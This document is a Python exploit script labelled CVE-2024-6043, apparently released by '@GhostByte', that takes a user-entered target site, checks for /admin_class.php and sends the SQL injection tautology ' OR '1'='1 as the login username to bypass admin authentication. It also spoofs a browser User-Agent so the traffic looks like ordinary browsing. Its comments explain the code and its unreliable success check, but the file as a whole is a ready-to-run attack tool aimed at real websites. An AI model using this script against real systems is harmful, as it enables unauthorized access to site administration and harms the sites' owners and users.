CVE-2024-6043.py
import requests
import time
import sys
# Headers attached to every request this script sends. The User-Agent is a
# fixed desktop-Chrome string rather than the python-requests default, so
# User-Agent filtering alone will not tell this traffic apart from a browser.
laz_headers = {
    "User-Agent": (
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
        "AppleWebKit/537.36 (KHTML, like Gecko) "
        "Chrome/114.0.0.0 Safari/537.36"
    ),
}
def check_path_exists(laz_url):
    """Report whether a GET of ``laz_url`` is answered with HTTP 200.

    Only the status code is inspected. A 200 shows that the URL answered;
    it says nothing about whether the endpoint is vulnerable. Any
    ``requests`` exception is printed and reported as ``False``.
    """
    # NOTE(review): no timeout is passed, so an unresponsive host can block
    # this call indefinitely.
    try:
        probe = requests.get(laz_url, headers=laz_headers)
    except requests.exceptions.RequestException as err:
        print(f"Error checking the path: {err}")
        return False
    return probe.status_code == 200
def inject_payload(laz_url, laz_payload):
    """POST a login form to ``laz_url`` with ``laz_payload`` as the username.

    The form has two fields: ``username`` (the caller's value) and a fixed
    ``password`` of ``any_password``. Returns the ``requests`` response, or
    ``None`` after printing the error if the request raises.

    The value only matters to a server that concatenates ``username`` into
    its SQL text; a query that binds the username as a parameter treats it
    as plain data. The constant password string is a stable marker when
    searching request logs for this script.
    """
    form_fields = dict(username=laz_payload, password="any_password")
    try:
        return requests.post(laz_url, data=form_fields, headers=laz_headers)
    except requests.exceptions.RequestException as err:
        print(f"Error during injection: {err}")
        return None
def simulate_injection():
    """Draw an "Injecting..." spinner on stdout for about two seconds.

    Purely cosmetic: 20 frames, 0.1 s apart, and no network activity of any
    kind happens inside this function.
    """
    frames = "|/-\\"
    frame_count = len(frames)
    tick = 0
    while tick < 20:
        # "\r" returns to the start of the line so each frame overwrites the last.
        sys.stdout.write(f"\rInjecting... {frames[tick % frame_count]}")
        sys.stdout.flush()
        time.sleep(0.1)
        tick += 1
    print("\rInjection complete. ")
def check_injection_success(laz_response):
    """Guess from the response body whether the login was bypassed.

    Returns ``True`` when ``laz_response.text`` contains any of "Welcome",
    "Dashboard", "admin" or "logout" as a case-sensitive substring, and
    ``False`` otherwise.

    This is a weak heuristic and neither answer is proof. An ordinary login
    or error page that merely mentions one of these words yields ``True``,
    and an application that words its pages differently yields ``False``.
    Do not use the result to decide that a host is patched or unpatched.
    """
    body = laz_response.text
    for marker in ("Welcome", "Dashboard", "admin", "logout"):
        if marker in body:
            return True
    return False
def main():
    """Interactive driver for the login-form check.

    Flow, as implemented here:
      1. Print the banner and prompt for a base URL.
      2. Append ``/admin_class.php`` to it (plain concatenation, with no
         normalisation of the typed value) and probe that URL with a GET.
      3. If the probe returns 200 and the user answers ``y``, POST a login
         form whose ``username`` is the tautology string ``' OR '1'='1``.
      4. Print a verdict based on a keyword match against the response body.

    The verdict in step 4 is not reliable in either direction, so the
    "failed" message is not evidence that a host is patched.
    """
    print("""
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ██╔════╝ ██╔═████╗██║ ██║╚════██╗
██║ ██║ ██║█████╗ █████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗███████╗ ██║██╔██║███████║ █████╔╝
██║ ╚██╗ ██╔╝██╔══╝ ╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝██╔═══██╗████╔╝██║╚════██║ ╚═══██╗
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ ██║ ╚██████╔╝╚██████╔╝ ██║██████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝╚═════╝
BY @GhostByte discord.gg/byt
""")
    base_url = input("Enter the target site (e.g., http://target-site.com): ").strip()
    endpoint = base_url + "/admin_class.php"
    print(f"Checking if {endpoint} exists...")

    # Guard: anything other than an HTTP 200 from the probe ends the run.
    if not check_path_exists(endpoint):
        print(f"The path {endpoint} does not exist. Exiting.")
        return

    print("The path exists.")
    answer = input("Do you want to inject the payload? (Y/N): ").strip().lower()
    if answer != 'y':
        print("Injection aborted by the user.")
        return

    tautology = "' OR '1'='1"
    simulate_injection()  # cosmetic spinner only; the request is sent on the next line
    reply = inject_payload(endpoint, tautology)
    # A requests.Response is falsy for 4xx/5xx statuses, so an error status
    # (or None after a transport error) goes straight to the "failed" branch.
    if reply and check_injection_success(reply):
        print("SQL Injection successful! Admin login bypassed.")
    else:
        print("SQL Injection failed. The target might be patched or not vulnerable.")
# Start the interactive flow only when the file is executed as a script;
# importing it as a module sends nothing and prompts for nothing.
if __name__ == "__main__":
    main()